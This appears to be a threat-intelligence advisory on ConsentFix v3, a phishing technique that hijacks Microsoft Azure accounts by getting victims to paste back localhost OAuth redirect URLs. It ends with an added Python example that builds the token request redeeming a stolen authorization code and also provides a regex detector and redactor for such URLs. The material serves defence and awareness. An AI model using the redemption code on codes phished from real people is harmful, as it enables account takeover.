Automated ConsentFix v3 Attack Targets Microsoft Azure Accounts
Severity: High (Score: 69.5)
Sources: Bleepingcomputer, Scworld
Summary
A new attack technique named ConsentFix v3 has emerged that automates the hijacking of Microsoft Azure accounts through phishing. It builds on earlier versions by adding automation and scale intended to get past existing defenses. The technique combines social engineering with abuse of the OAuth2 authorization code flow to obtain unauthorized access to user accounts.

Attackers first identify valid tenant IDs and gather employee details to use in impersonation. They create multiple accounts across several services and use Pipedream as the central automation tool. The phishing lure is a page hosted on Cloudflare that mimics the Microsoft/Azure interface and instructs victims to paste back a localhost URL containing an OAuth authorization code: the attacker's flow redirects the victim's browser to a loopback address where nothing is listening, and the victim hands over the resulting URL. Once the code is captured, the automation exchanges it at the token endpoint for access and refresh tokens, which grant access to the victim's environment.

The full impact of this technique is still being assessed, and mitigations are recommended. It is not yet clear whether this variant has seen widespread adoption among cybercriminals.

Key Points:
• ConsentFix v3 automates Microsoft Azure account hijacking by abusing the OAuth2 authorization code flow.
• Attackers gather employee details for impersonation and create multiple accounts across third-party services to run the campaign.
• Recommended mitigations include token binding and behavioral detection rules.
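As an added illustration that is not part of this advisory or the reporting it summarizes, the following Python shows the two pieces a practitioner most needs to understand here: how a pasted loopback redirect URL yields an authorization code that a public client (such as a CLI tool) can redeem with no client secret, because the PKCE verifier belongs to whoever started the flow, and how a defender can scan free text (chat messages, helpdesk tickets, form submissions) for such URLs and redact the code before it is stored or forwarded. The tenant and client IDs, the PKCE verifier and the sample pasted message are placeholders constructed for the example; the token endpoint format is the Microsoft identity platform v2.0 endpoint.

```python
"""Added example (not from the advisory or its sources): parse a pasted
loopback OAuth2 redirect, build the token-endpoint request an attacker's
automation would send, and scan/redact such URLs in free text.
All IDs, the verifier and the sample message are constructed placeholders."""
import re
from typing import Optional, Tuple
from urllib.parse import urlparse, parse_qs, urlencode

# Placeholder values for illustration only (hypothetical, not a real tenant/app).
TENANT_ID = "00000000-0000-0000-0000-000000000000"
CLIENT_ID = "11111111-1111-1111-1111-111111111111"

LOOPBACK_HOSTS = ("localhost", "127.0.0.1", "::1")


def extract_auth_code(pasted_url: str) -> Optional[dict]:
    """Return {'code', 'state', 'redirect_uri'} when the text is a loopback
    redirect carrying an authorization code; None otherwise."""
    try:
        parsed = urlparse(pasted_url.strip())
    except ValueError:  # e.g. malformed IPv6 brackets
        return None
    if parsed.scheme not in ("http", "https"):
        return None
    if parsed.hostname not in LOOPBACK_HOSTS:
        return None
    params = parse_qs(parsed.query)  # drops empty values, so "code=" -> absent
    code = params.get("code", [None])[0]
    if not code:
        return None
    # The redirect_uri presented at the token endpoint must equal the one used
    # in the authorize request: scheme, host, port and path, without the query.
    redirect_uri = f"{parsed.scheme}://{parsed.netloc}{parsed.path or '/'}"
    return {"code": code, "state": params.get("state", [None])[0],
            "redirect_uri": redirect_uri}


def build_token_request(code_info: dict, code_verifier: str,
                        tenant_id: str = TENANT_ID,
                        client_id: str = CLIENT_ID) -> Tuple[str, str]:
    """Build the authorization_code grant the attacker's automation would POST.
    A public client has no secret, and the PKCE verifier is the one the
    attacker generated when building the authorize URL, so the pasted code
    alone is enough to obtain tokens. Returned, not sent."""
    token_endpoint = f"https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token"
    body = urlencode({
        "grant_type": "authorization_code",
        "client_id": client_id,
        "code": code_info["code"],
        "redirect_uri": code_info["redirect_uri"],
        "code_verifier": code_verifier,
        # Azure Resource Manager scope plus offline_access for a refresh token.
        "scope": "https://management.azure.com/.default offline_access",
    })
    return token_endpoint, body


# Defender side: loopback URL with a code= parameter embedded in free text.
LOOPBACK_CODE_RE = re.compile(
    r"https?://(?:localhost|127\.0\.0\.1|\[::1\])(?::\d{1,5})?/"
    r"[^\s\"'<>]*[?&]code=[^\s&\"'<>]+",
    re.IGNORECASE,
)


def find_pasted_redirects(text: str) -> list:
    """Return every loopback redirect URL carrying an authorization code
    found in the text (chat message, ticket body, web form field)."""
    return [m.group(0) for m in LOOPBACK_CODE_RE.finditer(text)]


def redact_auth_codes(text: str) -> str:
    """Replace authorization code values so the message can be stored or
    forwarded without leaking a redeemable code."""
    return re.sub(r"([?&]code=)[^\s&\"'<>]+", r"\1[REDACTED]", text,
                  flags=re.IGNORECASE)


# Constructed sample of what a victim might paste back into a chat or form.
SAMPLE_PASTE = (
    "Hi, the page said to paste this back: "
    "http://localhost:8400/?code=0.AXYAexampleCodeValue123"
    "&state=abc123&session_state=ss-1 thanks!"
)

if __name__ == "__main__":
    for url in find_pasted_redirects(SAMPLE_PASTE):
        info = extract_auth_code(url)
        endpoint, body = build_token_request(info, code_verifier="constructed-verifier")
        print("code:", info["code"], "redirect_uri:", info["redirect_uri"])
        print("would POST to", endpoint, "with", body)
    print(redact_auth_codes(SAMPLE_PASTE))
```

The scanner is deliberately narrow (loopback host plus a `code=` parameter) so it can run on high-volume text with few false positives; a legitimate user has no reason to paste a loopback redirect into a web page, chat or ticket, which is why it makes a reasonable awareness and DLP signal alongside the token binding and behavioral detections the advisory recommends.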
Key Entities
- Phishing (attack_type)
- ConsentFix (campaign)
- Microsoft (company)
- Microsoft Azure (product)
- Outlook (product)
- hunter.io (domain)
- T1041 - Exfiltration Over C2 Channel (mitre_attack)
- T1078 - Valid Accounts (mitre_attack)
- T1566.002 - Spearphishing Link (mitre_attack)
- Azure CLI (tool)
- DocSend (tool)
- Pipedream (tool)
- Specter Portal (tool)
- Tutanota (tool)
- Cloudflare Pages (platform)